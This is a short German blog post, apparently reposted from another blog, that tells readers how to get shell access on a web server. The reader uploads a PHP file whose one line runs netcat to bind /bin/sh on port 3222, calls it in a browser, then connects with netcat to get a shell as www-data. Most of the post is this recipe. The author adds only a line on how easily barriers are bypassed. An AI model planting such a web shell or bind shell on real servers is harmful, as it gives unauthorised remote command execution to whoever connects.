how to get shell access in no mans land

Eine Datei namens givemeshell.php erstellen und auf den Webserver laden, die sollte so was wie

<?php system("nc -lp 3222 -e /bin/sh"); ?>

enthalten. Danach die Datei per Webbrowser aufrufen und dann lokal

netcat webserver 3222

aufrufen. Und schon hat man unter Debian (Ubuntu sicherlich auch) eine shell als www-data.
Ich hab den Artikel erst nur überflogen, wohl weil ich damals schon einen LB eingesetzt habe und die Apache Server alle gut abgeschirmt sind. Es ist immer wieder interessant wie schnell man einfache Barrieren umgehen kann.

via nion’s blog

Ein Gedanke zu „how to get shell access in no mans land“

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.